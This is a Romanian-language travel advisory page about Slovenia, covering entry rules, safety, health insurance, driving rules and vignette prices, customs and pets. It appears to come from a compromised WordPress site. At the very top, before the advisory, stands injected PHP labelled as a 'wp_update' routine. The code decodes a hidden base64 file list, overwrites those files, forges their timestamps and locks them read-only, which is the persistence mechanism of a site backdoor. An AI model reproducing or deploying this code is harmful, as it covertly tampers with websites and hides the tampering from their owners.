Warning: filemtime(): stat failed for /home/shuffles/public_html/.htaccess in /home/shuffles/public_html/wp-includes/feed.php on line 855
$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Slovenia – O noua atitudine

Slovenia

  • Nu există restricţii de călătorie.

Ultima actualizare:

8 ianuarie 2010

Condiţii de intrare şi regim de şedere

Cetăţenii români nu au nevoie de viză pentru a călători în Republica Slovenia.

Intrarea în Republica Slovenia este permisă cu paşaportul sau cartea de identitate în curs de valabilitate.

Pentru verificarea condiţiilor particulare de intrare şi şedere prevăzute de legislaţia naţională vă recomandăm consultarea informaţiilor oficiale furnizate de autorităţile slovene:

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Ameninţări teroriste

Terorismul este un fenomen global, nelocalizat, prin urmare nici Republica Slovenia nu poate fi exclusă din faţa acestei ameninţări.

Slovenia nu a suferit atacuri teroriste directe pe teritoriul naţional.

Vă recomandăm să urmăriţi în permanenţă anunţurile şi recomandările făcute de autorităţile slovene şi să accesaţi periodic site-ul web al Ministerului român al Afacerilor Externe.

Siguranţă şi criminalitate

Slovenia este o ţară sigură din punctul de vedere al criminalităţii.

Infracţiuni minore de tipul furtului din buzunare, înşelăciunilor sau furtului din maşini pot apărea în zone aglomerate (gări, staţii, parcări, centre comerciale, benzinării sau zone de servicii pe autostrăzi).

Recomandări generale:

  • Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie banii, cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
  • Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă.
  • În cazul călătoriei cu autobuzul sau trenul păstraţi atenţia asupra bagajelor pe întreaga durată a călătoriei.
  • Pentru ieşirile în oraşe, în special în zonele aglomerate, lăsaţi documentele personale la hotel şi păstraţi numai o copie a actelor de identitate (paşaport, permis de şedere).

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, vă recomandăm să contactaţi poliţia locală precum şi cel mai apropiat oficiu consular român:

  • Ambasada României din Ljubljana

În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor slovene, trebuie apelate următoarele numere de urgenţă:

  • 112 – Servicii de urgenţă (Pompieri si Salvarea)
  • 113 – Poliţie

Atenţie! Dacă sunaţi din greşeală la 112, nu închideţi! În caz contrar, vi se poate trimite o maşină în locul în care vă aflaţi, pentru a vedea dacă totul este în regulă!

Sistemul medical

Asigurarea medicală este obligatorie în Republica Slovenia.

Vă recomandăm cu insistenţă să încheiaţi o asigurare medicală de sănătate sau să obţineţi Cardul European de Sănătate înainte de a pleca într-o călătorie.

Dacă vă îmbolnăviţi sau aveţi un accident pe durata unei şederi temporare într-un stat membru UE, formularul E112 sau Cardul european de asigurări sociale de sănătate vă va da acces la îngrijirile medicale necesare.

Acest Card vă va permite să primiţi asistenţa medicală necesară în timpul şederii dumneavoastră temporare în orice ţară a Uniunii Europene.

Mai multe detalii găsiţi la adresele : www.cnas.ro/ şi www.ceass.ro/.

Este bine ca asigurarea medicală suplimentară să fievalabilă în toate ţările. În baza unei asemenea asigurări, facultative, aveţi acces la serviciile de urgenţă atât din sistemul public de sănătate, cât şi din cel privat (în funcţie de tipul poliţei de asigurare). La încheierea unei asemenea asigurări verificaţi coordonatele partenerului societăţii de asigurare în ţara de destinaţie şi de tranzit.

Vă recomandăm să vă încheiaţi, înainte de plecare, o asigurare de călătorie. Aceasta are valabilitate în toate ţările şi poate să acopere de la riscurile de bază (îmbolnăviri, accidente, urgenţe stomatologice, repatriere sanitară sau în caz de deces) până la toate riscurile de călătorie, inclusiv pierderea/ furtul/ deteriorarea bagajelor, anularea plecării în străinătate, falimentul companiei aeriene etc.

Asigurarea de viaţă s-a dovedit benefică pentru familiile celor decedaţi în urma unor accidente sau din motive de boală.

În Uniunea Europeană nu aveţi nevoie de vaccinări speciale.

Condiţii privind traficul auto

Circulaţia auto:
În Republica Slovenia, circulaţia auto se efectuează pe partea dreaptă a drumului.
Pe tot parcursul anului este obligatoriu ca farurile să fie aprinse în permanenţă (faza de întâlnire).
Funcţionează sistemul priorităţii de dreapta.
Este interzisă oprirea autoturismului pe banda de urgenţă.

Atenţie! În cazul în care primiţi o amendă şi nu dispuneţi de suma necesară, autorităţile competente slovene (poliţia si / sau compania slovena care administrează autostrăzile – DARS) au dreptul să vă reţină actele până la plata amenzii.
În urma încălcării legislaţiei privind siguranţa traficului rutier autorităţile competente eliberează un proces verbal de amenda si un proces verbal de reţinere a tuturor documentelor de identitate ale conducătorului auto şi ale autoturismului.
În Republica Slovenia autorităţile poliţieneşti pot fi prezente atât în uniformă cât şi civili cu autoturisme corespunzătoare.

Atenţie! În cazul în care, în urma unui control al poliţiei rutiere slovene, există suspiciuni privind provenienţa legală a maşinii, aceştia au dreptul să reţină autovehiculul până la identificarea acestuia, perioada care poate dura până la 6 luni, fără drept de despăgubire.

Atenţie! Începând cu data de 1 iulie 2009, pentru vinietele aferente utilizării reţelei de autostrăzi din Slovenia, sunt aplicate următoarele tarife:

Pentru autovehiculele de pana la 3,5 t:

vinietele cu o valabilitate de 1 săptămână costă 15 Euro
vinietele cu o valabilitate de 1 lună pot fi achiziţionate cu 30 de Euro

Pentru motociclete:

  • vinietele cu o valabilitate de 1 an pot fi achiziţionate cu 95 Euro
  • vinietele cu o valabilitate de 6 luni sunt desfiinţate
  • vinietele cu o valabilitate de 1 săptămână costă 8 Euro
  • vinietele cu o valabilitate de 1 lună costă 15 Euro
  • vinietele cu o valabilitate de 6 luni costă 25 Euro
  • vinietele cu o valabilitate de 1 an costă 48 Euro

Pentru autovehiculele cu masa de peste 3,5 t se va utiliza in continuare sistemul valabil in prezent:  plata la staţia  de taxare.

Vinietele pot fi achiziţionate de la staţiile de carburanţi din Ungaria, Croaţia, Austria, Italia – înainte de intrarea pe teritoriul Republicii Slovenia sau de la prima staţie de carburanţi de pe teritoriul Sloveniei. Informaţii suplimentare referitoare la punctele de vânzare a vinietelor se pot obţine la adresa: https://www.dars.si/Dokumenti/Toll/Methods_of_payment/Vehicles_under_35_t/Vignette/Sales_points_309.aspx

Contravenţia pentru nerespectarea legislaţiei locale este de 300 euro sau 150 euro achitaţi în termen de 8 zile.

Starea drumurilor
Starea generală a drumurilor şi a infrastructurii este bună.

Parcarea
Parcarea este permisă numai în locuri rezervate, contra cost, iar tichetele trebuie afişate la vedere în interiorul maşinii.

Centura de siguranţă
În Republica Slovenia, centura de siguranţă este obligatorie.

Limitele de viteză admise

  • în localităţi — 60 km/oră
  • în afara localităţilor – 90 km/oră
  • autostrăzi – 130 km/oră.

Depăşirea limitelor de viteză poate atrage aplicarea unor amenzi intre 300 si 1000 de euro şi suspendarea permisului de conducere în cazul în care şoferii au depăşit cu 30 km/h limita de viteză.

Folosirea telefonului mobil la volan
Este interzisă.

Permisul de conducere
Permisul de conducere românesc este valabil în Slovenia.

Aparatele anti-radar şi de detectare a radarului
Conform legislaţiei slovene, aparatele care interferează sau împiedică funcţionarea dispozitivelor utilizate de către organismele autorizate în controlul traficului rutier sunt interzise.

Amenzile pentru încălcarea legislaţiei privind siguranţa traficului rutier pentru acest articol sunt cuprinse intre 400 euro si 800 euro pentru persoanele fizice.

  • Informaţii pentru cazurile de accident de circulaţie:
    În caz de accident uşor, notaţi elementele de identificare ale celuilalt autovehicul implicat în accident şi ale societăţii de asigurare a acestuia.
    Dacă în urma accidentului sunt răniţi, chemaţi poliţia locală, după ce aţi acordat primul ajutor. Adresaţi-vă pentru sprijin partenerului societăţii de asigurări din Republica Slovenia.
    Păstraţi documentele de plată până la înapoierea în ţară pentru a le prezenta societăţii de asigurare.

Telefoane utile în caz de urgenţă:

  • 112 sau 911- Urgenţă (Pompieri si Salvare)
  • 113 – Poliţia

Utilizarea cărţilor de credit

În Republica Slovenia există un sistem bine dezvoltat şi o reţea puternică de ATM-uri. Se acceptă plata cu cărţi de credit/debit la majoritatea magazinelor, restaurantelor, staţiilor de benzină.

Reglementări vamale

Nu există controale la graniţele interne, dintre statele semnatare ale Acordului Schengen: Austria, Belgia, Danemarca, Estonia, Finlanda, Franţa, Germania, Grecia, Italia, Letonia, Lituania, Luxemburg, Malta, Olanda, Polonia, Portugalia, Republica Cehă, Slovacia, Republica Slovenia, Spania, Suedia, Ungaria, precum şi Islanda, Norvegia şi Elveţia (ultimele trei nefiind membre ale UE).

Din motive de ordine publică, sănătate publică sau de securitate naţională, la graniţele interne ale UE se pot introduce controale, pentru perioade limitate.

Limitele cantitative pentru introducerea anumitor produse sunt: ţigări: 200 bucăţi (1 cartuş) sau 100 ţigări de foi sau 50 trabucuri sau 250 grame tutun; 1 litru băuturi alcoolice cu concentraţia mai mare de 22 % sau 2 litri de băutură cu concentraţia mai mica de 22 % sau 16 litri de bere, parfum 50 ml sau 250 ml apă de toaletă.

Este interzisă scoaterea din Republica Slovenia a obiectelor de artă şi cultură.

In Republica Slovenia este interzisă deţinerea ilegală de arme de foc, iar intrarea/tranzitarea spaţiului acestei tari cu arme de foc se poate efectua doar cu aprobarea scrisa a autoritatilor competente.

Posesia unei arme de foc pentru care nu a fost obtinuta aprobarea duce in mod automat la confiscarea ei si amendarea detinatorului, chiar daca acesta poseda un permis de port arma eliberat de un alt stat membru / nemembru al Uniunii Europene.

Sfătuim persoanele interesate sa se adreseze din timp organelor politienesti slovene pentru obtinerea autorizatiei de intrare / tranzitare cu arme de foc a Republicii Slovenia.

Regimul medicamentelor

Sunt excluse atât la intrare cât şi la ieşire drogurile de orice tip şi substanţele dopante.

Atenţie! Nu luaţi cu dumneavoastră decât cantităţile de medicamente strict necesare!

Vă recomandăm să aveţi la dumneavoastră reţeta medicului pentru medicamentele care depăşesc sfera celor uzuale.

Antibioticele nu se eliberează decât pe bază de reţetă.

Regimul animalelor de companie

Pentru spaţiul UE, aveţi nevoie de paşaport european pentru animalele de companie. Acest document se poate procura de la medicul veterinar şi trebuie să conţină informaţii despre vaccinarea antirabică.

Animalul trebuie identificat printr-un microcip electronic. Până în iulie 2011, se acceptă, de asemenea, şi un tatuaj lizibil.

By o9admin